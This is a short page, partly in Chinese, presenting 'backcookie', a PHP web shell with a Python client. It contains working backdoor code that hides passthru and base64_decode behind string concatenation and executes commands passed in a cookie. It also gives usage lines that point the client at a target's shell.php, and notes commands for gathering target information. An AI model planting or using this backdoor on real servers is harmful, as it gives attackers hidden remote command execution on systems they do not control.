使用 cookie 的小型后门。
==========
<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie
自定义命令(binfo),可以获取目标信息。
@pwned:~$ binfo
自定义命令(exit),用于退出。
@pwned:~$ exit
版权所有,2013 - 2016 Jose Pino